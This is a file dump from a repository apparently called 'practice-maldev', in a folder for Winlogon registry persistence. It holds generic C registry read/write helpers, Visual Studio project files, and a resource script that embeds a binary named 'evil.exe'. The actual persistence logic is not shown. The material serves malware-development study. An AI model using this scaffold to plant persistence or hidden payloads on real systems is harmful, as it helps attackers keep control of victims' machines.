/simple-persistence/windows-service/windows-service.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/winlogon-registry/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/reg/Winlogon.reg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/winlogon-registry/reg/Winlogon.reg
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/registry.c:
--------------------------------------------------------------------------------
1 | #include "registry.h"
2 |
3 | /*
4 | * Example usage:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = NULL;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, L"Aticleworld"); // create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", 12082016); // write DWORD
13 | if (status != TRUE) return FALSE;
14 |
15 | status = ReadDwordFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", &readData); // read DWORD
16 | if (status != TRUE) return FALSE;
17 | printf("%lu", readData);
18 |
19 | status = WriteStringToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", L"Happy"); // write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = ReadStringFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", &readMessage); // read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != NULL) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage); // buffer is malloc'd by ReadStringFromRegistry; the caller owns it
27 | readMessage = NULL;
28 | }
29 | */
30 |
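BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
{
    /*
     * Create `subkey` under `hKeyParent`, or open it if it already exists.
     * The key handle is closed before returning, so the caller only learns
     * whether the key now exists.
     *
     * Returns TRUE on success, FALSE if RegCreateKeyExW fails (the Win32
     * error code is printed).
     */
    HKEY hKey = NULL;
    DWORD dwDisposition = 0;    /* REG_CREATED_NEW_KEY / REG_OPENED_EXISTING_KEY; not reported to the caller */
    LSTATUS Ret;

    /* Only KEY_READ is requested on the returned handle: it is closed
     * immediately, so no write rights are needed on it, and the narrower
     * mask still succeeds where an ACL denies KEY_ALL_ACCESS. */
    Ret = RegCreateKeyExW(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE,
                          KEY_READ, NULL, &hKey, &dwDisposition);
    if (Ret != ERROR_SUCCESS) {
        /* Registry functions return the Win32 error code directly and do not
         * set the thread's last-error value, so report Ret, not GetLastError(). */
        printf(" [-] Error Opening or Creating new key. Code = %lu\n", (unsigned long)Ret);
        return FALSE;
    }
    RegCloseKey(hKey);
    return TRUE;
}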
46 |
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
{
    /*
     * Store `data` as a REG_DWORD value named `valueName` under
     * `hKeyParent\subkey`. The key is opened, not created, so it must
     * already exist.
     *
     * Returns TRUE only if both the open and the set succeeded.
     */
    HKEY hKey;
    BOOL written;

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    written = (RegSetValueExW(hKey, valueName, 0, REG_DWORD,
                              (LPBYTE)&data, sizeof(data)) == ERROR_SUCCESS);
    /* The handle is released on both outcomes. */
    RegCloseKey(hKey);
    return written;
}
65 |
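BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
{
    /*
     * Store the wide string `strData` as a REG_SZ value named `valueName`
     * under `hKeyParent\subkey`. The key must already exist.
     *
     * Returns TRUE if the key opened and the value was written; FALSE
     * otherwise, including when strData is NULL.
     */
    HKEY hKey;
    DWORD cbData;
    BOOL written;

    if (strData == NULL)
        return FALSE;

    /* Byte count including the terminating NUL. lstrlenW is named explicitly:
     * the generic lstrlen() resolves to lstrlenA when UNICODE is not defined,
     * which would miscount a wide string. sizeof(WCHAR) replaces the literal 2. */
    cbData = (DWORD)(((size_t)lstrlenW(strData) + 1) * sizeof(WCHAR));

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    written = (RegSetValueExW(hKey, valueName, 0, REG_SZ,
                              (LPBYTE)strData, cbData) == ERROR_SUCCESS);
    RegCloseKey(hKey);
    return written;
}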
82 |
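BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData)
{
    /*
     * Read the REG_DWORD value `valueName` from `hKeyParent\subkey` into
     * *readData.
     *
     * Returns TRUE and sets *readData only when the key opens, the value
     * exists, and it is a 4-byte REG_DWORD. Returns FALSE otherwise and
     * leaves *readData untouched.
     */
    HKEY hKey;
    DWORD data = 0;
    DWORD type = 0;
    DWORD len = sizeof(data);
    LSTATUS Ret;

    if (readData == NULL)
        return FALSE;

    Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
    if (Ret != ERROR_SUCCESS)
        return FALSE;

    Ret = RegQueryValueExW(hKey, valueName, NULL, &type, (LPBYTE)&data, &len);
    RegCloseKey(hKey);

    /* The previous version returned TRUE after a failed query, leaving
     * *readData uninitialised, and accepted values of any type. */
    if (Ret != ERROR_SUCCESS || type != REG_DWORD || len != sizeof(data))
        return FALSE;

    *readData = data;
    return TRUE;
}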
105 |
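BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData)
{
    /*
     * Read the string value `valueName` from `hKeyParent\subkey`.
     *
     * On success *readData points to a malloc'd, NUL-terminated wide string
     * that the caller must release with free(), and TRUE is returned. On any
     * failure FALSE is returned, nothing is leaked, and *readData is not
     * modified.
     *
     * Only REG_SZ and REG_EXPAND_SZ values are accepted; REG_EXPAND_SZ data
     * is returned unexpanded.
     */
    HKEY hKey;
    DWORD type = 0;
    DWORD cbBuffer = TOTAL_BYTES_READ;  /* current capacity handed to the API, in bytes */
    DWORD cbData;                       /* in: capacity; out: bytes stored (or required) */
    PWCHAR buffer;
    PWCHAR grown;
    LSTATUS Ret;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    /* One extra WCHAR beyond the capacity reported to the API: RegQueryValueExW
     * does not guarantee that string data is NUL-terminated. The original
     * allocated sizeof(PWCHAR) * len bytes, far more than it told the API about. */
    buffer = (PWCHAR)malloc(cbBuffer + sizeof(WCHAR));
    if (buffer == NULL) {
        RegCloseKey(hKey);
        return FALSE;
    }

    for (;;) {
        cbData = cbBuffer;
        Ret = RegQueryValueExW(hKey, valueName, NULL, &type, (LPBYTE)buffer, &cbData);
        if (Ret != ERROR_MORE_DATA)
            break;

        /* Grow by at least OFFSET_BYTES, or straight to the size the API asked
         * for. The original never checked realloc() and would have leaked the
         * old buffer on failure. */
        cbBuffer = (cbData > cbBuffer + OFFSET_BYTES) ? cbData : cbBuffer + OFFSET_BYTES;
        grown = (PWCHAR)realloc(buffer, cbBuffer + sizeof(WCHAR));
        if (grown == NULL) {
            free(buffer);
            RegCloseKey(hKey);
            return FALSE;
        }
        buffer = grown;
    }
    RegCloseKey(hKey);

    /* Both failure paths previously leaked the buffer. */
    if (Ret != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        free(buffer);
        return FALSE;
    }

    /* Terminate explicitly. cbData <= cbBuffer here, so the spare WCHAR
     * allocated above is always within bounds; an odd byte count is rounded
     * down so the terminator stays aligned. */
    buffer[cbData / sizeof(WCHAR)] = L'\0';

    *readData = buffer;
    return TRUE;
}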
140 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/registry.h:
--------------------------------------------------------------------------------
#pragma once
/* NOTE(review): the three include targets below were lost in extraction.
 * registry.c uses the Win32 registry API (RegOpenKeyExW etc.), printf and
 * malloc/realloc/free, so the originals presumably named the Windows SDK
 * header and the C stdio/stdlib headers - confirm against the repository. */
#include
#include
#include
/* The Reg* functions are exported by advapi32. */
#pragma comment(lib, "AdvAPI32.Lib")

/* Initial buffer capacity, in bytes, passed to RegQueryValueExW by ReadStringFromRegistry. */
#define TOTAL_BYTES_READ 1024
/* Growth step, in bytes, applied each time RegQueryValueExW reports ERROR_MORE_DATA. */
#define OFFSET_BYTES 1024

/* Create hKeyParent\subkey (or open it if present); the handle is closed before returning. */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
/* Write `data` as a REG_DWORD value; the key must already exist. */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
/* Write the wide string `strData` as a REG_SZ value; the key must already exist. */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
/* Read a DWORD value into *readData. */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
/* Read a string value into a malloc'd buffer stored at *readData; the caller frees it with free(). */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by winlogon-registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/winlogon-registry/winlogon-registry.aps
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------